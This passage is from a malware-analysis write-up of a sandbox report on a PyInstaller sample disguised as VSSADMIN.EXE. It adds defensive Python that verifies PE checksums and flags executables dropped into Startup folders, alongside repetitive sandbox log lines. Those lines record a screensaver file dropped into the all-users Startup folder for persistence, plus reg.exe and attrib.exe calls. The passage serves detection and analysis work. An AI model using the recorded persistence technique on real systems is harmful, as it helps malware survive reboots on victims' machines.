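skeleton whose field values are assumptions chosen for illustration.

```python
import struct

# Sizes and offsets from the PE/COFF specification.
PE_SIGNATURE = b"PE\0\0"
FILE_HEADER_SIZE = 20
CHECKSUM_OFFSET_IN_OPTIONAL_HEADER = 64   # same for PE32 (0x10b) and PE32+ (0x20b)


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum, located via e_lfanew."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew + 4 + FILE_HEADER_SIZE + CHECKSUM_OFFSET_IN_OPTIONAL_HEADER


def pe_checksum(data: bytes) -> int:
    """Recompute the image checksum the way imagehlp!CheckSumMappedFile does.

    Every 32-bit word of the file except the CheckSum field is summed with
    end-around carry, the sum is folded to 16 bits, and the file length is
    added. A short tail is treated as zero-padded to a dword boundary.
    """
    skip_index = checksum_field_offset(data) // 4
    padded = data + b"\0" * ((4 - len(data) % 4) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == skip_index:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def check_image(data: bytes):
    """(stored, computed, verdict): the sandbox's 'real checksum: X should be: Y' comparison."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    if stored == computed:
        verdict = "ok"
    elif stored == 0:
        verdict = "unset"      # linker left the field empty; common in benign binaries
    else:
        verdict = "mismatch"   # header patched or file modified after linking
    return stored, computed, verdict


def build_minimal_pe(size: int = 0x200, checksum: int = 0) -> bytes:
    """Constructed PE32+ header skeleton used only as test input.

    It is not loadable and not derived from the sample; it carries just
    enough of the DOS, file and optional headers to locate CheckSum.
    """
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)            # e_lfanew: PE signature at 0x40
    buf[0x40:0x44] = PE_SIGNATURE
    struct.pack_into("<H", buf, 0x44, 0x8664)          # Machine: AMD64
    struct.pack_into("<H", buf, 0x54, 0xF0)            # SizeOfOptionalHeader for PE32+
    struct.pack_into("<H", buf, 0x56, 0x0022)          # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    struct.pack_into("<H", buf, 0x58, 0x20B)           # optional header Magic: PE32+
    struct.pack_into("<I", buf, 0x58 + CHECKSUM_OFFSET_IN_OPTIONAL_HEADER, checksum)
    return bytes(buf)


if __name__ == "__main__":
    for stored in (0, 0x2B5F, 0x1234):
        print("stored=%#x computed=%#x verdict=%s" % check_image(build_minimal_pe(checksum=stored)))
```

              To apply it to a real file, pass the bytes of the file on disk (not a memory dump, since the loader rewrites headers and sections in memory). Treat "unset" as context only and "mismatch" as worth a closer look, especially when two files on the same host report the same stored and expected pair, which is what the sample and the dropped .scr show above.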

              Persistence and Installation Behavior

              Source: C:\Windows\System32\cmd.exe | Process created: reg.exe (6 occurrences)
              Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe (4 occurrences)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr (3 occurrences)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\libffi-8.dll
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\select.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\libssl-1_1.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_bz2.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\unicodedata.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\sqlite3.dll
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_socket.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_queue.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_sqlite3.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_decimal.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_ssl.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_hashlib.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_lzma.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\_ctypes.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\python311.dll
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll
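              Two very different things are mixed in the list above. The %TEMP%\_MEI68562 directory is where a PyInstaller one-file bundle unpacks the Python runtime (python311.dll, the .pyd extension modules, the OpenSSL and SQLite DLLs) before running the embedded script; those writes are staging, not persistence. The one line that matters for persistence is the .scr written into the all-users Startup folder (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp), which Explorer executes for every user at logon, and which the surrounding reg.exe and attrib.exe invocations are typical for setting up. The Python below is an added example, not part of the Joe Sandbox report: it parses "File created" lines in the form used on this page (both the raw extraction form and the separator form), separates PyInstaller staging from autostart writes, and flags executable file types dropped into an autostart location. The sample lines are constructed from the entries above; the directory markers and extension list are the example's own assumptions and cover only the Startup folders, not Run keys or scheduled tasks.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample modelled on the "File created" lines in this report.
# Both the raw extraction form (no separator, trailing "Jump to ..." link
# text) and the separator form are included; "???.scr" is kept as printed.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrJump to dropped file",
    r"Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\python311.dll",
    r"Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe",
    r"Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll",
    r"Source: C:\Windows\System32\cmd.exeProcess created: reg.exe",
]

# Tolerates "exeFile created:" (raw extraction) as well as "exe | File created:".
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*File created:\s*(?P<dst>.+?)(?:\s*Jump to .*)?$"
)

# Lower-case substrings of directories Windows launches from at logon.
# Assumed list for illustration: the per-user and all-users Startup folders.
AUTOSTART_DIR_MARKERS = (r"\microsoft\windows\start menu\programs\startup",)

# File types the shell executes when found in a Startup folder.
EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".lnk"}
NATIVE_CODE_EXTENSIONS = EXEC_EXTENSIONS | {".dll", ".pyd"}

# PyInstaller one-file bundles unpack the Python runtime into %TEMP%\_MEI<pid>.
PYINSTALLER_STAGING_RE = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)


def parse_event(line: str):
    """Return (source_process, created_path), or None for non-file-creation lines."""
    m = EVENT_RE.match(line)
    return (m.group("src"), m.group("dst")) if m else None


def classify_drop(path: str) -> str:
    """Label a dropped file by where it landed and whether it can run from there."""
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    ext = p.suffix.lower()
    if any(marker in parent for marker in AUTOSTART_DIR_MARKERS):
        return "autostart" if ext in EXEC_EXTENSIONS else "autostart-nonexec"
    if PYINSTALLER_STAGING_RE.search(str(p)):
        return "pyinstaller-staging"
    if ext in NATIVE_CODE_EXTENSIONS:
        return "temp-executable"
    return "other"


def triage(lines):
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        src, dst = parsed
        findings.append({
            "source": src,
            "path": dst,
            "name": PureWindowsPath(dst).name,
            "verdict": classify_drop(dst),
        })
    return findings


def persistence_findings(lines):
    """Only the drops that will execute again at the next logon."""
    return [f for f in triage(lines) if f["verdict"] == "autostart"]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        src_name = PureWindowsPath(f["source"]).name
        print(f"{f['verdict']:22} {src_name:18} -> {f['path']}")
```

              Run against the full "File created" list of a report, the output reduces two dozen runtime drops to the single Startup-folder entry, which is the file to collect, hash and compare against the original sample. On a live host the same question is answered by listing both Startup folders and checking any entry against the expected software inventory; a screensaver executable there is never a default Windows artifact.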

              Boot Survival

              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr (3 occurrences)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 0_2_00007FF614C73E10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF614C73E10
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
